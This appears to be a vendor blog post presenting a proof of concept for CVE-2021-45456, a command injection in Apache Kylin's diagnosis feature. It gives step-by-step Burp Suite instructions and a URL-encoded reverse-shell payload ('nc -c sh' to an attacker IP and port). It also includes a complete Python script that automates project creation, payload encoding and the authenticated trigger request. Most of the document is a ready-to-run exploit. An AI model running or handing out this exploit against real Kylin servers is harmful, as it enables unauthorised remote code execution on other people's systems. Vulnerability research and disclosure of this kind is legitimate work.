
Introduction
A command injection in Apache Kylin has been found and registered as CVE-2021-45456. At vsociety we managed to leverage it for remote code execution (RCE) and built a proof of concept (PoC).
A full analysis of this CVE is coming soon, so stay tuned for an in-depth look at how the vulnerability works.
Proof of concept
Add a project
Project names may not contain any special characters except the underscore (_), so the project is named after the payload with every other character stripped out, as follows:
my payload is: nc -c sh 172.17.0.1 9001
so the project name is: nccsh17217019001
Go to “System”
Turn interception on in your proxy (Burp Suite)
Click “Diagnosis” and intercept the request
Send it to Repeater, then drop the intercepted request so the legitimate diagnosis request is not sent
The payload after URL encoding (every character other than letters and digits is percent-encoded, including the backticks, spaces, dashes and dots):
%60nc%20%2dc%20sh%20172%2e17%2e0%2e1%209001%60
The decoded payload: `nc -c sh 172.17.0.1 9001`
Replace the project name in the request with the encoded payload
Start the listener (here nc listening on 172.17.0.1:9001) and send the request from Repeater; the shell comes back when the backtick-wrapped command is executed on the Kylin host
NOTES
Adding a / to the payload, encoded or not, will not work; see the analysis on vsociety for the reason. This is also why the payload uses nc -c sh rather than a one-liner that references /bin/sh, and it requires a netcat on the target that supports the -c exec option (Ncat does).
You need permission to create a project, so that the project name can be derived from the payload.
Exploitation fails if the project name in the request differs from the payload by even a single additional letter: after stripping, what you send must match exactly the project you created.
The IP address and port are part of the project name. Create the project with the IP's dots removed, then add the dots back in the request as URL-encoded %2e.
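The steps and notes above can be automated. The following helper is an added example written for this page, not code from the vsociety write-up or from Apache Kylin: it derives the project name from the payload with the stripping rule described above, percent-encodes the backtick-wrapped payload exactly as shown (lowercase hex, dashes and dots included), rejects payloads that the notes say cannot work (a / anywhere), and builds the two requests of the PoC. The Kylin REST paths (CREATE_PROJECT_PATH, DIAGNOSIS_PATH) and the JSON body shape for project creation are assumptions: replace them with the paths and body you captured in Burp for your Kylin version.

```python
"""Helper for the CVE-2021-45456 Apache Kylin diagnosis command-injection PoC.

Added example, not code from the vsociety write-up or from Apache Kylin.
The Kylin endpoint paths and the project-creation JSON body are ASSUMPTIONS;
verify them against the requests captured in Burp before relying on them.
"""
import json
import re
import sys
import urllib.request
from base64 import b64encode

# ASSUMED Kylin REST paths; confirm against the captured Burp requests.
CREATE_PROJECT_PATH = "/kylin/api/projects"
DIAGNOSIS_PATH = "/kylin/api/diag/project/{project}/download"

# Everything except letters, digits and '_' is stripped from project names.
NOT_ALLOWED = re.compile(r"[^A-Za-z0-9_]")


def project_name_for(command: str) -> str:
    """Name of the project to create: the command with every character other
    than letters, digits and '_' removed (the stripping rule from the write-up)."""
    return NOT_ALLOWED.sub("", command)


def encode_payload(payload: str) -> str:
    """Percent-encode every byte that is not a letter, digit or '_', in lowercase
    hex, so that '`', ' ', '-' and '.' are all encoded as in the write-up
    (urllib.parse.quote would leave '-' and '.' bare)."""
    out = []
    for byte in payload.encode():
        ch = chr(byte)
        if ch.isascii() and (ch.isalnum() or ch == "_"):
            out.append(ch)
        else:
            out.append("%%%02x" % byte)
    return "".join(out)


def check_payload(command: str) -> list:
    """Reasons (empty list if none) why the write-up says this payload cannot
    work: a '/' anywhere in it, or nothing left once stripped."""
    problems = []
    if "/" in command:
        problems.append("payload contains '/', which the write-up says never works")
    if not project_name_for(command):
        problems.append("nothing is left after stripping; the project name would be empty")
    return problems


def build_requests(base_url: str, command: str) -> dict:
    """Build, without sending, the two requests of the PoC: create the project
    under the stripped name, then request a diagnosis with the backtick-wrapped,
    fully percent-encoded command where the project name normally goes."""
    name = project_name_for(command)
    wrapped = "`" + command + "`"
    return {
        "create_project": {
            "method": "POST",
            "url": base_url + CREATE_PROJECT_PATH,
            # ASSUMED body shape: the project description is nested as a JSON string.
            "body": json.dumps({"projectDescData": json.dumps({"name": name, "description": ""})}),
        },
        "trigger": {
            "method": "GET",
            "url": base_url + DIAGNOSIS_PATH.format(project=encode_payload(wrapped)),
            "body": None,
        },
    }


def send(spec: dict, user: str, password: str) -> int:
    """Send one built request with HTTP Basic auth and return the status code.
    urllib passes the percent-encoded path through untouched."""
    data = spec["body"].encode() if spec["body"] else None
    req = urllib.request.Request(spec["url"], data=data, method=spec["method"])
    token = b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    if data:
        req.add_header("Content-Type", "application/json")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.status


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit(f"usage: {sys.argv[0]} http://kylin:7070 USER PASSWORD 'nc -c sh 172.17.0.1 9001'")
    base, user, password, command = sys.argv[1:]
    problems = check_payload(command)
    if problems:
        sys.exit("\n".join(problems))
    reqs = build_requests(base, command)
    print("project name:", project_name_for(command))
    print("create project ->", send(reqs["create_project"], user, password))
    # Start the listener (nc -lvnp 9001) before triggering the diagnosis.
    print("trigger        ->", send(reqs["trigger"], user, password))
```

The stripping rule and the encoder are the two pieces worth checking before sending anything: if project_name_for(command) is not byte-for-byte the project you created, or the encoder leaves a dot or dash bare, the request will be rejected or will not match, which is exactly the failure the notes describe.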
About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.